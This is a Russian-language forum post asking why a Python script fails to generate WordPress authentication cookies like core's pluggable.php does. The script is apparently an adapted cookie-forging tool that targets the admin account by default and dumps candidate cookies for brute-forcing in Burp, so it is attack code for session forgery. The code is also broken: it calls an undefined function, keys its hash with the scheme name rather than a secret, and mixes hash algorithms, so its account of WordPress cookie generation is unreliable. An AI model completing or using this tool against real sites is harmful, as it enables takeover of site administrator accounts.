cookiegen

[Leonard123]

Всем привет, подскажите почему скрипт не генерирует cookie? Нужно что бы он генерировал их как тут > https://core.trac.wordpress.org/browser/tags/5.6.12/src/wp-includes/pluggable.php

#!/usr/bin/python
import hmac
import hashlib
import string
import sys
import getopt
import random

def wp_hash(data, key, scheme):
    return hmac.new(key.encode('utf-8'), data.encode('utf-8'), hashlib.sha256).hexdigest()

def wp_generate_auth_cookie(user_id, expiration, scheme='auth', token=''):
    user = str(user_id)
    pass_frag = user[-4:]

    key = wp_hash(user + '|' + pass_frag + '|' + expiration + '|' + token, scheme, scheme)

    algo = 'sha256'
    hash_val = hmac.new(key.encode('utf-8'), (user + '|' + expiration + '|' + token).encode('utf-8'), hashlib.sha1).hexdigest()
    
    cookie = user + '|' + expiration + '|' + token + '|' + hash_val

    return cookie

def gen_cookies(username, expiration, pass_frag, scheme, target):
    frag_array = []

    if pass_frag == '':
        frag_array = gen_pass_frag()
    else:
        frag_array = [pass_frag]

    allcookies = ''
    i = 0

    for frag in frag_array:
        random_token = ''.join(random.choices(string.ascii_letters + string.digits, k=32))
        cookie = wp_generate_auth_cookie(username + frag, expiration, scheme, random_token)

        print(f"[DEBUG] Generated cookie: {cookie}")  # Debug output

        allcookies += str(i) + ':' + frag + ':' + cookie + '\n'
        i += 1

    print('\n[+] Cookie generation complete. Created ' + str(i) + ' cookie(s).')

    if i == 1:
        print('[+] Cookie: ' + allcookies.split(':')[2])
    else:
        filename = 'wordpress_' + hashlib.md5(target.encode('utf-8')).hexdigest() + '_' + username + '_cookies.txt'
        with open(filename, 'w') as f:
            f.write(allcookies)
        print('[+] Cookies written to file [' + filename + ']\n')

def main(argv):
    username = 'admin'
    pass_frag = ''
    expiration = '1577836800'
    scheme = 'auth'
    target = 'http://localhost/wordpress'

    print("\nWordPress Auth Cookie Generator")
    print("Author: Mike Czumak (T_v3rn1x) - @SecuritySift - securitysift.com")
    print("Purpose: Generates WP auth cookies (requires valid Secret Key and Salt)")

    usage = '''\nUsage: wpcookiegen.py\n\nOptions:
        -u <username> (default is admin)
        -f <pass_frag> (default/blank will generate all combos)
        -e <expiration> (unix_date_stamp: default is 1/1/2020)
        -s <scheme> (default is auth)
        -t <target> (default is http://localhost/wordpress)\n\nNotes:
        You can parse the cookie list directly in Burp with the following regex:
        ^[0-9]*:[0-9a-zA-z\.\/]{4}:\n'''

    try:
        opts, args = getopt.getopt(argv, 'hu:f:e:s:t:')
    except getopt.GetoptError:
        print(usage)
        sys.exit(2)

    for opt, arg in opts:
        if opt == '-h':
            print(usage)
            sys.exit()
        elif opt == '-u':
            username = arg
        elif opt == '-f':
            pass_frag = arg
        elif opt == '-e':
            expiration = arg
        elif opt == '-s':
            scheme = arg
        elif opt == '-t':
            target = arg

    gen_cookies(username, expiration, pass_frag, scheme, target)

if __name__ == '__main__':
    main(sys.argv[1:])